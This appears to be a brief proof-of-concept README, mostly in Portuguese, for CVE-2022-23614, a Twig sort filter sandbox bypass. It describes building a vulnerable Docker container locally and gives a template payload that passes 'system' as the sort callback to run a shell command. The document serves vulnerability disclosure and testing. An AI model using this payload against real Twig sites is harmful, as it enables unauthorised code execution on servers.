
PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)
PoC para CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (execução de código do filtro de classificação Twig / bypass de sandbox)
Como visto neste commit - https://github.com/twigphp/Twig/commit/.., o twig estava passando o nome da função fornecida pelo usuário como parâmetro de callback para uasort (aqui), levando assim à execução arbitrária de código
Para construir e executar o contêiner docker com uma versão vulnerável do twig
$ ./build-docker.sh
Abra a página web em localhost:1337 e tente renderizar o seguinte payload
{{ ['id','']|sort('system') }}
PoC

Result
